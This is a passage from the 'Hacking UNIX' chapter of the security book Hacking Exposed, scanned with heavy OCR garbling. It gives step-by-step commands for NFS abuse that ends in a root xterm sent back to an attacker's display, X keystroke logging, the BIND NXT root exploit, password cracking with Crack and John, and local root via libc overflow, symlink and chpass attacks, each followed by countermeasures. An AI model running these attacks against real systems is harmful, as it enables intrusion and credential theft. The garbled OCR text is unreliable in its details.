Using a privileged port (1021) 

Mount TCP, transfer size 8192 bytes. 



Nexf we will check fhe sfafus of fhe cormecfion and defermine fhe UID used when fhe file 
sysfem was mounfed: 



nfs> status 
User id 
Group id 
Remote host 
Mount path 
Transfer size 



-2 

-2 



' quake ' 
8192 



We can see fhaf we have mounfed /, and fhaf our UID and GID are -2. For securify 
reasons, if you mounf a remofe file sysfem as roof, your UID and GID will map fo some- 
fhing ofher fhan 0. In mosf cases (wifhouf special opfions), you can mounf a file sysfem as 
any UID and GID ofher fhan 0 or roof. Because we mounfed fhe enfire file sysfem, we can 
easily lisf fhe confenfs of fhe / etc/passwd file. 

nfs> cd /etc 



nfs> cat passwd 

root : X : 0 : 1 : Super-User : / : /sbin/ sh 

daemon : x : 1 : 1 : : / : 

bin:x:2:2: :/usr/bin: 

sys : x : 3 : 3 : : / : 

adm: x : 4 : 4 : Admin : /var /adm : 

Ip : X : 71 : 8 : Line Printer Admin : /usr/spool/lp : 
smtp : X : 0 : 0 : Mail Daemon User:/: 

UUCP : X : 5 : 5 : uucp Admin : /usr/lib/uucp : 

nuucp : X : 9 : 9 : UUCP Admin : /var/ spool /uucppublic :/usr/lib/uucp/uucico 

listen:x:37:4: Network Admin : /usr /net /nls : 

nobody :x:60001:60001:Nobody:/: 

noaccess : X : 60002 : 60002 :No Access User:/: 

nobody4 : x : 65534 : 65534 : SunOS 4.x Nobody:/: 

gk :x:1001:10: : /export /home /gk : /bin/sh 

sm: X : 1003 : 10 : : /export /home /sm: /bin/sh 
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Listing /etc/passwd provides the usernames and associated user IDs. However, 
the password file is shadowed so it cannot be used to crack passwords. Since we can't 
crack any passwords and we can't mount the file sysfem as roof, we musf defermine whaf 
ofher UIDs will allow privileged access. Daemon has pofenfial, buf bin or UID 2 is a good 
bef because on many sysfems fhe user bin owns fhe binaries. If affackers can gain access 
fo fhe binaries via NFS or any ofher means, mosf sysfems don'f sfand a chance. Now we 
musf mounf /usr, alfer our UID and GID, and affempf fo gain access fo fhe binaries: 

nfs> mount /usr 

Using a privileged port (1022) 

Mount '/usr', TCP, transfer size 8192 bytes. 

nfs> uid 2 

nfs> gid 2 

nfs> status 

User id : 2 

Group id : 2 

Remote host : 'quake' 

Mount path : '/usr' 

Transfer size: 8192 

We now have all fhe privileges of bin on fhe remofe sysfem. In our example, fhe file sys- 
fems were nof exporfed wifh any special options fhaf would limif bin's abilify fo creafe 
or modify files. Af fhis poinf, all fhaf is necessary is fo fire off an xt e rm or fo creafe a back 
channel fo our sysfem fo gain access fo fhe fargef sysfem. 

We creafe fhe following scrip! on our sysfem and name if in . f tpd: 

# ! /bin/sh 

/usr /openwin/bin/xterm -display 10.10.10.10:0.0 & 

Nexf, on fhe fargef sysfem we cd info / sbin and replace in . f tpd wifh our version: 

nfs> cd /sbin 
nfs> put in.ftpd 

Finally, we allow fhe fargef server fo cormecf back fo our X server via fhe xhost com- 
mand and issue fhe following command from our sysfem fo fhe fargef server: 

[tsunami]# xhost +quake 

quake being added to access control list 
[tsunami]# ftp quake 
Connected to quake . 

The resulfs, a roof-owned xterm like fhe one represenfed nexf, will be displayed on 
our sysfem. Because in . f tpd is called wifh roof privileges from inetd on fhis sysfem, 
inetd will execufe our scrip! wifh roof privileges resulting in insfanf roof access. 



334 



Hacking Exposed: Network Security Secrets and Solutions 



# id 

uid=0(root) gid=0(root) 

# 

O NFS Countermeasure 

If NFS is not required, NFS and related services (for example, mountd, statd, and 
lockd) should be disabled. Implement client and user access controls to allow only au- 
thorized users to access required hies. Generally, /etc /exports or 

/etc/dfs/dfstab or similar files control what file systems are exported and specific 
options that can be enabled. Some options include specifying machine names or 
netgroups, read-only options, and the ability to disallow the SUID bit. Each NFS imple- 
mentation is slightly different, so consult the user documentation or related man pages. 
Also, never include the server's local IP address or localhost in the list of systems allowed 
to mount the file system. Older versions of the portmapper would allow attackers to 
proxy cormections on behalf of the attackers. If the system were allowed to mount the ex- 
ported file system, attackers could send NFS packets to the target system's portmapper, 
which in turn would forward the request to the localhost. This would make the request ap- 
pear as if it were coming from a trusted host and b 5 q?ass any related access control rules. 
Finally, apply all vendor-related patches. 




X Insecurities 



Popularity: 


8 


Simplicity: 


9 


Impact: 


5 


Risk Rating: 


8 



The X Window System provides a wealth of features that allow many programs to 
share a single graphical display. The major problem with X is that its security model is an 
all or nothing approach. Once a client is granted access to an X server, pandemonium is 
allowed. X clients can capture the keystrokes of the console user, kill windows, capture 
windows for display elsewhere, and even remap the keyboard to issue nefarious com- 
mands no matter what the user t 5 q)es. Most problems stem from a weak access control 
paradigm or pure indolence on the part of the system administrator. The simplest and 
most popular form of X access control is xhost authentication. This mechanism provides 
access control by IP address and is the weakest form of X authentication. As a matter of 
convenience, a system administrator will issue xhost +, allowing unauthenticated ac- 
cess to the X server by any local or remote user (+ is a wildcard for any IP address). Worse, 
many PC-based X servers default to xhost +, unbeknown to their users. Attackers can 
use this seemingly benign weakness to compromise the security of the target server. 

One of the best programs to identify an X server with xhost + enabled is xscan. Xscan 
will scan an entire subnet looking for an open X server and log all keystrokes to a log file. 



Chapter 8: Hacking UNIX 



335 



[tsunami] $ xscan quake 

Scanning hostname quake . . . 

Connecting to quake (192.168.1.10) on port 6000... 

Connected . 

Host quake is running X. 

Starting keyboard logging of host quake : 0 . 0 to file KEYLOGquake : 0 . 0 . . . 

Now any keystrokes t 5 ^ed at the console will be captured to the KEYLOG . quake file. 

[tsunami] $ tail -f KEYLOG . quake : 0 . 0 

su - 

[Shift_L] lamowned [Shift_R] ! 

A quick tail of the log file reveals what the user is typing in real time. In our example, 
the user issued the su command followed by fhe root password of "lamowned!" Xscan 
will even note if the SHIFT keys are pressed. 

It is also easy for affackers to view specific windows miming on the target systems. 
Attackers must first determine the window's hex ID by using the xlwins command. 

[tsunami]# xlswins -display quake: 0.0 | grep -i netscape 

0x1000001 (Netscape) 

0x1000246 (Netscape) 

0x1000561 (Netscape: OpenBSD) 

Xlswins will return a lot of information, so in our example, we used grep to see if 
Netscape was rurming. Luckily for us, it was. However, you can just comb through the re- 
sults of xlswins to identify an interesting window. To actually display the Netscape 
window on our system, we use the XWatchWin program, as shown in Figure 8-3. 

[tsunami]# xwatchwin quake -w 0x1000561 

By providing the window ID, we can magically display any window on our system 
and silently observe any associated activity. 

Even if xhost - is enabled on the target server, attackers may be able to capture a 
screen of fhe console user's session via xwd if fhe attackers have local shell access and 
sfandard xhost aufhenfication is used on the target server. 

[quake] $ xwd -root -display localhost : 0 . 0 > dump. xwd 

To display the screen capture, copy the file fo your sysfem by using xwud: 

[tsunami]# xwud -in dump. xwd 

As if we hadn't covered enough insecurities, it is simple for attackers to send 
KeySym's to a window. Thus, attackers can send keyboard events to an xt e rm on the tar- 
get system as if they were typed locally. 
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Q penBSD 

The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system. Our 
efforts place emphasis on portability, standardization, correctness, security, and cryptography. OpenBSD 
supports binary emulation of most programs from SVR4 (Solaris), FreeBSD, Linux, BSDI, SunOS, and HPUX. 

The current release of OpenBSD is 2^ which started shipping May 19, 1999. The CDs (and Shirts) can be 
ordered... OpenBSD is freely available from our FTP sites, and also available in an inexpensive 2-CD set. The 



costs of producing the CD sets have been underwritten by a grant from the USENIX Association. 
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release to become available on CD. project funding is still a big issue since OpenBSD has no real 
backer — the development team members are volunteers. Every sold CD or financial donation 
easier for us to make new releases. 
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Figure 8-3. With XWatchWin, we can remotely view almost any X application on the user's desktop 



O X Countermeasure 

Resist the temptation to issue the xhost + command. Don't be lazy, be secure! If you are in 
doubt, issue the xhost - command. Xhost - will not terminate any existing connections; 
it will only prohibit future connections. If you musf allow remote access to your X server, 
specify each server by IP address. Keep in mind fhaf any user on fhaf server can connect to 
your X server and snoop away. Other security measures include using more advanced au- 
thentication mechanisms like MIT-MAGIC-COOKIE-1, XDM-AUTHORIZATION-1, and 
MIT-KERBEROS-5. These mechanisms provided an additional level of security when 
connecting to the X server. If you use xterm or a similar terminal, enable the secure key- 
board option. This will prohibit any other process from infercepting your keysfrokes. Also 
consider firewalling porfs 6000-6063 fo prohibif unaufhorized users from cormecfing fo 
your X server porfs. Einally, consider using ssh and ifs furmeling functionality for en- 
hanced security during your X sessions. Just make sure ForwardXll is configured fo 
"yes" in your sshd_conf ig or sshd2_conf ig file. 
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Domain Name System (DNS) Hijinks 



Popularity: 


9 


Simplicity: 


7 


Impact: 


10 


Risk Rating: 


9 



DNS is one of the most popular services used on the Internet and most corporate 
intranets. As you might imagine, the ubiquity of DNS also lends itself to attack. Many at- 
tackers routinely probe for vulnerabilities in the most common implementation of DNS 
for UNIX, the Berkeley Internet Name Domain (BIND) package. Additionally, DNS is 
one of the few services that is almost always required and running on an organization's 
Internet perimeter network. Thus, a flaw in bind will almost surely result in a remote 
compromise (most times with root privileges). To put the risk into perspective, a 1999 se- 
curity survey reported that over 50 percent of all DNS servers cormected to the Internet 
are vulnerable to attack. The risk is real — ^beware! 

While there have been numerous security and availability problems associated with 
BIND (see http:/ /www.cert.org/advisories/CA-98.05 .bind_problems.html), we are going 
to focus on one of the latest and most deadly attacks to date. In November 1999, CERT re- 
leased a major advisory indicating serious security flaws in BIND (http: / / www.cert.org/ 
advisories/ CA-99-14-bind.html). Of the six flaws noted, the most serious was a remote 
buffer overflow in the way BIND validates NXT records. See http://www.dns.net/ 
dnsrd/rfc/ rfc2065.html for more information on NXT records. This buffer overflow al- 
lows remote attackers to execute any command they wish with root provided on the af- 
fected server. Let's take a look at how this exploit works. 

Most attackers will set up automated tools to try to identify a vulnerable server run- 
ning named. To determine if your DNS has this potential vulnerability, you would per- 
form the following enumeration technique: 

[tsunami]# dig 010.1.1.100 version. bind chaos txt 

; <<>> DiG 8.1 <<>> @10.1.1.100 version. bind chaos txt 
; (1 server found) 

; ; res options: init recurs defnam dnsrch 
; ; got answer: 

; ; -»HEADER«- opcode: QUERY, status: NOERROR, id: 10 

; ; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 
; ; QUERY SECTION: 

; ; version . bind, type = TXT, class = CHAOS 

; ; ANSWER SECTION: 

VERSION. BIND . OS CHAOS TXT "8.2.2" 

This will query named and determine the associated version. Again, this underscores 
how important accurately footprinting your environment is. In our example, the target 
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DNS server is running named version 8.2.2, which is vulnerable to the NXT attack. Other 
vulnerable versions of named include 8.2 and 8.2.1. 

For this attack to work, the attackers must control a DNS server associated with a valid 
domain. It is necessary for fhe affackers fo sef up a subdomain associafed wifh fheir do- 
main on fhis DNS server. For our example, we will assume fhe affacker's nefwork is af- 
fackers.org, fhe subdomain is called "hash," and fhe affackers are rurming a DNS server 
on fhe sysfem called quake. In fhis case, fhe affackers would add fhe following enfry fo 
/var/named/attackers . org . zone on quake and resfarf named via fhe named con- 
frol inferface (ndc): 

subdomain IN NS hash . attackers . org . 

Again, quake is a DNS server fhaf fhe affackers already control. 

After the attackers compile the associated exploit written by the ADM crew 
(http: / /packetstorm.securify.com/9911-exploits/ adm-nxt.c), it must be run from a sep- 
arafe sysfem (fsunami) wifh fhe correcf archifecfure. Since named runs on many UNIX 
varianfs, fhe following archifecfures are supporfed by fhis exploif. 

[tsunami]# adm-nxt 

Usage: adm-nxt architecture [command] 

Available architectures: 



1 


Linux Redhat 6.x - 


named 


8 . 2/8 . 2 . 1 


(from rpm) 


2 


Linux SolarDiz ' s non- 


exec stack patch 


- named 8.2/8 


3 


Solaris 


7 (Oxff) 


named 


CO 

hJ 




4 


Solaris 


2.6 


named 


CO 




5 


FreeBSD 


3.2-RELEASE - 


named 


8.2 




6 


OpenBSD 


2.5 


named 


8.2 




7 


NetBSD 


1.4.1 


named 


CO 





We know from foofprinfing our fargef sysfem wifh nmap fhaf if is RedHaf 6.x; fhus, 
option 1 is chosen. 

[tsunami]# adm-nxt 1 

Once fhis exploif is rim, if will bind fo UDP porf 53 on fsunami and waif for a connec- 
tion from fhe vulnerable name server. You musf nof run a real DNS server on fhis sysfem, 
or fhe exploif will nof be able fo bind fo porf 53. Keep in mind, fhe whole exploif is predi- 
cafed on having fhe fargef name server cormecf fo (or query) our fake DNS server, which 
is really fhe exploif lisfening on porf UDP porf 53. So how does an attacker accomplish 
fhis? Simple. The attacker simply asks fhe fargef DNS server fo look up some basic infor- 
mation via fhe nslookup command: 

[quake]# nslookup 

Default Server: localhost.attackers.org 

Address: 127.0.0.1 
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> server 10.1.1.100 

Default Server: dns.victim.net 

Address: 10.1.1.100 

> hash . attackers . org 

Server: dns.victim.net 

Address: 10.1.1.100 

As you can see, the attackers run ns lookup in interactive mode on a separate system 
under their control. Then the attackers change from the default DNS server they would 
normally use to the victim's server 10.1.1.100. Finally, the attackers ask the victim DNS 
server the address of "hash.affackers.org". This causes fhe dns.vicfim.nef fo query fhe 
fake DNS server lisfening on UDP porf 53. Once fhe fargef name server cormecfs fo fsu- 
nami, fhe buffer overflow exploif will be senf fo fhe dns.vicfim.nef, rewarding fhe affack- 
ers wifh insfanf roof access, as shown nexf. 

[tsunami]# t666 1 

Received request from 10.1.1.100:53 for hash.attackers.org type=l 

id 

uid=0(root) gid=0(root) groups=0 (root) 

You may nofice fhaf fhe affackers don'f have a frue shell, buf can sfill issue commands 
wifh roof privileges. 

Q DNS Countermeasure 

Firsf and foremosf, disable and remove BIND on any sysfem fhaf is nof being used as a 
DNS server. On many stock rnsfalls of UNIX (parficularly Linux) named is fired up dur- 
ing hoof and never used by fhe sysfem. Second, you should ensure fhaf fhe version of 
BIND you are using is currenf and pafched for relafed securify flaws (see www.bmd.org). 
Third, run named as an unprivileged user. Thai is, named should fire up wifh roof privi- 
leges only fo bind fo porf 53 and fhen drop ifs privileges during normal operation wifh 
fhe -u option (named -u dns -g dns). Finally, named should be run from a chrooted ( ) 
environmenf via fhe - 1 opfion, which may help fo keep an affacker from being able fo fra- 
verse your file sysfem even if access is obfained (named -u dns -g dns -t /home/dns). 
While fhese securify measures will serve you well, fhey are nof foolproof; fhus, if is im- 
perafive fo be paranoid abouf your DNS server securify. 



LOCAL ACCESS 

Thus far, we have covered common remofe-access techniques. As mentioned previously, 
mosf affackers sfrive fo gain local access via some remote vulnerabilify. Af fhe poinf 
where affackers have an inferacfive command shell, fhey are considered fo be local on fhe 
sysfem. While if is possible fo gain direcf roof access via a remote vulnerabilify, often 
affackers will gain user access firsf. Thus, affackers musf escalate user privileges fo roof 
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access, better known as privilege escalation. The degree of difficulty in privilege escalation 
varies greatly by operating system and depends on the specific configurafion of fhe fargef 
sysfem. Some operafing sysfems do a superlative job of prevenfing users wifhouf roof 
privileges from escalafing fheir access fo roof, while ofhers do if poorly. A defaulf insfall 
of OpenBSD is going fo be much more difficulf for users fo escalafe fheir privileges fhan a 
defaulf insfall of Irix. Of course, fhe individual configurafion has a significanf impacf on 
fhe overall securify of fhe sysfem. The nexf secfion of fhis chapfer will focus on escalafing 
user access fo privileged or roof access. We should nofe fhaf in mosf cases attackers will 
affempf fo gain roof privileges; however, oftentimes if mighf nof be necessary. For exam- 
ple, if affackers are solely inferesfed in gaining access fo an Oracle dafabase, fhe affackers 
may only need fo gain access fo fhe Oracle ID, rafher fhan roof. 



Password Composition Vulnerabilities 



Popularity: 


10 


Simplicity: 


9 


Impact: 


9 


Risk Rating: 


9 



Based upon our discussion in the "Brute Force Attacks" section earlier, the risks of 
poorly selecfed passwords should be evidenf af fhis poinf. ft doesn'f maffer whefher af- 
fackers exploif password composifion vulnerabilities remofely or locally — weak pass- 
words puf sysfems af risk. Since we covered mosf of fhe basic risks earlier, lef 's jump righf 
info password cracking. 

Password cracking is commonly known as an automated dictionary attack. While brufe 
force guessing is considered an acfive affack, password cracking can be done offline and 
is passive in nafure. ft is a common local affack, as affackers musf obfain access fo fhe 
/ et c/pas swd file or shadow password file, ft is possible fo grab a copy of fhe password 
file remofely (for example, via TFTP or HTTP). However, we fell password cracking is 
besf covered as a local affack. ft differs from brufe force guessing as fhe affackers are nof 
frying fo access a service or su fo roof in order fo guess a password. Insfead, fhe affackers 
fry fo guess fhe password for a given accounf by encrypting a word or randomly gener- 
ated text and comparing the results with the encr 5 ^ted password hash obtained from 
/etc/passwd or the shadow file. 

If fhe encr)^ted hash mafches fhe hash generafed by fhe password-cracking pro- 
gram, fhe password has been successfully cracked. The process is simple algebra. If you 
know fwo ouf of fhree ifems, you can deduce fhe fhird. We know fhe dicfionary word or 
random fexf — ^weTl call fhis input. We also know fhe password-hashing algorifhm (nor- 
mally Dafa Encr 5 ^fion Sfandard (DBS)). Therefore, if we hash fhe inpuf by applying fhe 
applicable algorifhm and fhe resulfanf oufpuf mafches fhe hash of fhe fargef user ID, we 
know whaf fhe original password is. This process is illusfrafed in Figure 8-4. 
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3. The 
encrypted 
password is 
compared to 
the encrypted 
guesses until 
a match is 
found 



Figure 8-4. How password cracking is accompiished 



Two of the best programs available to crack passwords are Crack 5.0a from Alec 
Muffett, and John the Ripper from Solar Designer. Crack 5.0a, "Crack" for short, is proba- 
bly the most popular cracker available and has continuously evolved since its inception. 
Crack comes with a very comprehensive wordlist that runs the gamut from the un- 
abridged dictionary to Star Trek terms. Crack even provides a mechanism that allows a 
crack session to be distributed across multiple systems. John the Ripper, or "John" for 
short, is newer than Crack 5.0a and is highly optimized to crack as many passwords as 
possible in the shortest time. In addition, John handles more types of password hashing 
algorithms than Crack. Both Crack and John provide a facility to create permutations of 
each word in their wordlist. By default, each tool has over 2,400 rules that can be applied 
to a dictionary list to guess passwords that would seem impossible to crack. Each tool has 
extensive documentation that you are encouraged to peruse. Rather than discussing each 
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tool feature by feature, we are going to discuss how to run Crack and review the associ- 
ated output. It is important to be familiar wifh how a password file is organized. If you 
need a refresher on how fhe /etc/passwd file is organized, please consul! your UNIX 
fexfbook of choice. 

Crack 5.0a 

Rurming Crack on a password file is normally as easy as giving if a password file and 
waiting for fhe resulfs. Crack is a self-compiling program, and when execufed, will begin 
fo make cerfain componenfs necessary for operafion. One of Crack's sfrong poinfs is fhe 
sheer number of rules used fo creafe permufafed words. In addition, each fime if is exe- 
cufed, if will build a cusfom wordlisf fhaf incorporafes fhe user's name as well as any in- 
formation in fhe GECOS or commenfs field. Do nof overlook fhe GECOS field when 
cracking passwords. If is exfremely common for users fo have fheir full name lisfed in fhe 
GECOS field and fo choose a password fhaf is a combination of fheir full name. Crack will 
rapidly ferref ouf fhese poorly chosen passwords. Lef's fake a look af a bogus password 
file and begin cracking: 

root : cwIBREDaWLHmo : 0 : 0 : root : /root : /bin/bash 

bin:*:l:l:bin:/bin: 

daemon : * : 2 : 2 : daemon : / sbin : 

<other locked accounts omitted> 
nobody :*:99:99:Nobody:/: 

eric : GmTFgOAavFAOU : 500 : 0 : : /home/ eric : /bin/csh 

Samantha : XaDeasK8g8g3s : 501 : 503 : : /home/samantha : /bin/bash 

temp : kRWegG5iTZP5o : 502 : 50 6 : : /home /temp : /bin /bash 

hackme : nh . StBNcQnyE2 : 504 : 1 : : /home/hackme : /bin/bash 

bob : 9wynbWzXinBQ6 : 50 6 : 1 : : /home /bob : /bin/csh 

es : 0xUH8 9TiymLcc : 501 : 501 : : /home/ es : /bin /bash 

mother : jxZdltcz3wW2Q : 505 : 505 : : /home/mother : /bin/bash 

j f r : kyzKROryhFDE2 : 50 6 : 50 6 : : /home/ j f r : /bin /bash 

To execufe Crack againsf our bogus password file, we run fhe following command: 

[tsunami# Crack passwd 

Crack 5.0a: The Password Cracker. 

(c) Alec Muffett, 1991, 1992, 1993, 1994, 1995, 1996 

System: Linux 2.0.36 #1 Tue Oct 13 22:17:11 EOT 1998 1686 unknown 

<omitted for brevity> 

Crack: The dictionaries seem up to date... 

Crack: Sorting out and merging feedback, please be patient... 

Crack: Merging password files... 

Crack: Creating gecos-derived dictionaries 
mkgecosd: making non-permuted words dictionary 
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mkgecosd: making permuted words dictionary 
Crack: launching: cracker -kill run/system. 11324 



Done 

At this point Crack is running in the background and saving its output to a database. 
To query this database and determine if any passwords were cracked, we need to run 

Reporter: 

[tsunami]# Reporter -quiet 

passwords cracked as of Sat 13:09:50 EDT 

Guessed eric [jenny] [passwd /bin/csh] 

Guessed hackme [hackme] [passwd /bin/bash] 

Guessed temp [temp] [passwd /bin/bash] 

Guessed es [eses] [passwd /bin/bash] 

Guessed jfr [solarisl] [passwd /bin/bash] 

W e have displayed all the passwords that have cracked thus far by using fhe -quiet op- 
tion. If we execute Reporter with no options, it will display errors, warnings, and 
locked passwords. There are several scripts included with Crack that are extremely use- 
ful. One of fhe mosf useful scripts is shadmrg . sv. This script is used to merge the UNIX 
password file wifh the shadow file. Thus, all relevanf information can be combined info 
one file for cracking. Other commands of interesf include make t i dy, which is used fo re- 
move the residual user accounts and passwords after Crack has been executed. 

One final ifem that should be covered is learning how to identify the associated algorithm 
used to hash the password. Our test password file uses DBS fo hash fhe password files, 
which is standard for mosf UNIX flavors. As added security measures, some vendors 
have implemented MD5 and blowfish algorithms. A password that has been hashed with 
MD5 is significantly longer than a DBS hash and is identified by "$1" as the first two char- 
acters of the hash. Similarly, a blowfish hash is identified by "$2" as fhe firsf two characters 
of the hash. If you plan on cracking MD5 or blowfish hashes, we sfrongly recommend the 
use of John fhe Ripper. 

John the Ripper 

John fhe Ripper from Solar Designer is one of the best password cracking utilities avail- 
able and can be found af (hftp:// www.openwall.com/john/). You will find bofh UNIX 
and NT versions of John here, which is a bonus for Windows users. As mentioned before, 
John is one of fhe best and fastest password cracking programs available. It is extremely 
simple to run. 

[shadow]# john passwd 

Loaded 9 passwords with 9 different salts (Standard DES [24/32 4K] ) 
hackme (hackme) 

temp (temp) 
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eses (es) 

jenny (eric) 

t78 (bob) 

guesses: 5 time: 0:00:04:26 (3) c/s: 16278 trying: pireth - StUACT 

We run john, give it the password file that we want (passwd), and off if goes. If will 
identify the associated encrj^tion algorithm, in our case DBS, and begin guessing pass- 
words. It first uses a dictionary file (password .1st), and then begins brute force guess- 
ing. As you can see, fhe stock version of John guessed the user bob, while Crack was able 
to guess the user jfr. So we received different results with each program. This is primarily 
related to the limited word file thaf comes wifh john, so we recommend using a more 
comprehensive wordlisf, which is confrolled by fhe john . ini. Exfensive wordlists can 
be found af hffp:/ /packetsform.securify.com/ Crackers/ wordlists/. 

Q Password Composition Countermeasure 

See "Brute Force Countermeasure," earlier in this chapter. 




Local Buffer Overflow 



Popularity: 


10 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


10 



Local buffer overflow affacks are exfremely popular. As discussed in fhe "Remofe Ac- 
cess" section earlier, buffer overflow vulnerabilities allow attackers fo execute arbifrary 
code or commands on a targef sysfem. Mosf times, buffer overflow conditions are used fo 
exploif SUID roof files, enabling fhe attackers fo execufe commands wifh roof privileges. 
We already covered how buffer overflow conditions allow arbifrary command execution 
(see "Buffer Overflow Affacks" earlier). In fhis section, we discuss and give examples of 
how a local buffer overflow attack works. 

In May 1999, Shadow Penguin Securify released an advisory related fo a buffer over- 
flow condition in libc relating to the environmental variable LC_MESSAGES. Any SUID 
program that is djmamically linked to libc and honors the LC_MESSAGES environmen- 
tal variable is subject to a buffer overflow attack. This buffer overflow condition affecfs 
many differenf programs because if is a buffer overflow in fhe sysfem libraries (libc) 
rather than one specific program, as discussed earlier. This is an importanf poinf, and one 
of fhe reasons we chose this example. It is possible for a buffer overflow condition to af- 
fect many different programs if the overflow condition exisfs in libc. Lef's discuss how 
fhis vulnerability is exploited. 

First, we need to compile the actual exploit. Your mileage will vary greatly, as exploit 
code is very persnickety. Often you will have to tinker with the code to get it to compile, 
as it is platform dependenf. This particular exploit is written for Solaris 2.6 and 7. To com- 
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pile the code, we used gcc, or the GNU compiler; Solaris doesn't come with a compiler, 
imless purchased separately. The source code is designated by * . c. The executable will 
be saved as ex_lobc by using the -o option. 

[quake] $ gcc ex_lobc.c -o ex_lobc 

Next, we execute ex_lobc, which will exploit the overflow condition in libc via a SUID 
program like /bin/passwd: 

[ quake ] $ . /Gx_lobc 

jumping address : efffe7a8 
# 



The exploit then jumps to a specific address in memory, and /bin/shis run wifh roof 
privileges. This resulfs in the unmistakable # sign, indicating that we have gained root ac- 
cess. This exercise was quite simple and can make anyone look like a security expert. In 
reality, the Shadow Penguin Security group performed the hard work by discovering 
and exploiting this vulnerability. As you can imagine, the ease of obfaining roof access is 
a major attraction to most attackers when using local buffer overflow exploifs. 

Q Local Buffer Overflow Countermeasure 

The besf buffer overflow counfermeasure is secure coding pracfices combined wifh a 
non-execufable sfack. If fhe stack had been non-executable, we would have had a much 
harder time trying to exploit this vulnerability. See the remote "Buffer Overflow Attacks" 
section earlier for a complefe listing of coimtermeasures. Evaluafe and remove fhe SUID 
bit on any file fhaf does nof absolutely require SUID permissions. 




Symiink 



Popularity: 


7 


Simplicity: 


9 


Impact: 


10 


Risk Rating: 


9 



Junk files, scrafch space, femporary files — most systems are littered with electronic 
refuse. Fortunafely, in UNIX mosf femporary files are creafed in one directory, /tmp. 
While this is a convenient place to write temporary files, if is also fraughf with peril. 
Many SUID root programs are coded to create working files in / tmp or ofher directories 
without the slightest bit of sanify checking. The main securify problem sfems from pro- 
grams blindly following symbolic links to other files. A symbolic link is a mechanism 
where a file is created via the In command. A symbolic link is nothing more than a file 
fhaf points to a different file. Let's create a symbolic link from / tmp / f oo and poinf if to 
/ etc/passwd: 

[quake] $ In -s /tmp/foo /etc/passwd 
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Now if we cat out /tmp/ f oo, we get a listing of the password file. This seemingly 
benign feature is a root compromise waiting to happen. Although it is most common to 
abuse scratch files that are created in / tmp, there are applications that create scratch files 
elsewhere on the file system. Let's examine a real-life symbolic-link vulnerability to see 
what happens. 

In our example, we are going to study the dtappgather exploit for Solaris. 
Dtappgather is a utility shipped with the common desktop environment. Each time 
dtappgather is executed, it creates a temporary file named /var/dt/appconfig/ 
appmanager/generic-display-0 and sets the file permissions to 0666. It also 
changes the ownership of the file to the UID of the user who executed the program. Un- 
fortunately, dtappgather does not perform any sanity checking to determine if the file 
exists or if it is a symbolic link. Thus, if attackers were to create a symbolic link from 
/var/dt/appconf ig/appmanager/generic-display-0 to another file on the file 
system (for example, /etc/passwd), the permissions of this file would be changed to 0666 
and the ownership of the file would change to that of the attackers. We can see before we nm 
the exploit, the owner and group permissions of the file / etc/passwd are root:sys. 

[quake] $ Is -1 /etc/passwd 

-r-xr-xr-x 1 root sys 560 May 5 22:36 /etc/passwd 

Next, we will create a symbolic link from named /var /dt / appconf ig/ appmanager/ 
generic-display-0 to /etc/passwd. 

[quake] $ In -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0 
Finally, we will execute dt appgat he r and check the permissions of the / etc/passwd file. 

[quake] $ /usr/dt/bin/dtappgather 

MakeDi rectory : / var/ dt / appconf ig/ appmanager/ generic-display-0 : File exists 
[quake] $ Is -1 /etc/passwd 

-r-xr-xr-x 1 gk staff 560 May 5 22:36 /etc/passwd 

Dtappgather blindly followed our symbolic link to /etc/passwd and changed the 
ownership of the file to our user ID. It is also necessary to repeat the process on 
/etc/shadow. Once the ownership of /etc/passwd and /etc/shadow are changed 
to our user ID, we can modify both files and add a 0 UID (root equivalent) account to the 
password file. Game over in less than a minute's work. 

Q Symiink Countermeasure 

Secure coding practices are the best countermeasure available. Unfortunately, many pro- 
grams are coded without performing sanity checks on existing files. Programmers 
should check to see if a file exists before trying to create one, by using the 0_EXCL I 
0_CREAT flags. When creating temporary files, set the UMASK and then use 
tmpf lie { ) or mktemp { ) functions. If you are really curious to see a small complement 
of programs that create temporary files, execute the following in/binor/usr/sbin/. 



[quake] $ strings * Igrep tmp 
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If the program is SUID, there is a potential for attackers to execute a symlink attack. 
As always, remove the SUID bit from as many files as possible to mitigate the risks of 
symlink vulnerabilities. Finally, consider using a tool like LOpht Watch that monitors 
/tmp activity and informs you of programs that create temporary files. LOpht Watch can 
be obtained from http:/ /www.LOpht.com/advisories/lOpht-watch.tar.gz. 



File Descriptor Attacks 



Popularity: 


2 


Simplicity: 


6 


Impact: 


9 


Risk Rating: 


6 



File descriptors are nonnegative integers that the system uses to keep track of files 
rather than using specific filenames. By convention, file descriptors 0, 1, and 2 have im- 
plied uses that equate to standard input, standard output, and standard error, respec- 
tively. Thus, when the kernel opens an existing file or creates a new file, it returns a 
specific file descriptor that a program can use to read or write to that file. If a file 
descriptor is opened read / write (0_RDWR) by a privileged process, it may be possible for 
attackers to write to the file while it is being modified. Therefore, attackers may be able to 
modify a critical system file and gain root access. 

Oddly enough, the ever-bulletproof OpenBSD was vulnerable to a file descriptor allo- 
cation attack in version 2.3. Oliver Friedrichs discovered that the chpas s command used 
to modify some of the information stored in the password file did not allocate file 
descriptors correctly. When chpas s was executed, a temporary file was created that us- 
ers were allowed to modify with the editor of their choice. Any changes were merged 
back into the password database when the users closed their editor. Unfortunately, if at- 
tackers shelled out of the editor, a child process was spawned that had read/ write access 
to its parent's file descriptors. The attackers modified the temporary file (/tmp/ptmp) 
used by chpas s by adding a 0 UID account with no password. When the attackers closed 
the editor, the new account was merged into /etc/master . passwd and root access 
was granted. Let's look at exactly how this vulnerability is exploited. 

First, we change our default editor to vi because it allows a user to execute a shell 
while it is running: 

[dinky] $ export EDITOR=vi 

Next, we run the chpas s program: 

[dinky] $ /usr/bin/chpass 

This fires up vi with our user database information: 

iChanging user database information for gk . 

Shell: /bin/sh 
Full Name: grk 
Location : 
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Office Phone: 

Home Phone : blah 

We now shell out of vi by executing : ! sh. 

At this point our shell has inherited access to an open file descriptor. We execute our 
exploit and add a 0 UID account into the password file: 

[dinky] $ nohup ./chpass & 

[1] 24619 

$ sending output to nohup . out 

[1] + Done nohup ./chpass 

[dinky] $ exit 

Press any key to continue [: to enter more ex commands] : 

/etc/pw . F2 611 9 : 6 lines, 117 characters. 

[dinky] $ su owned 
[dinky]# id 

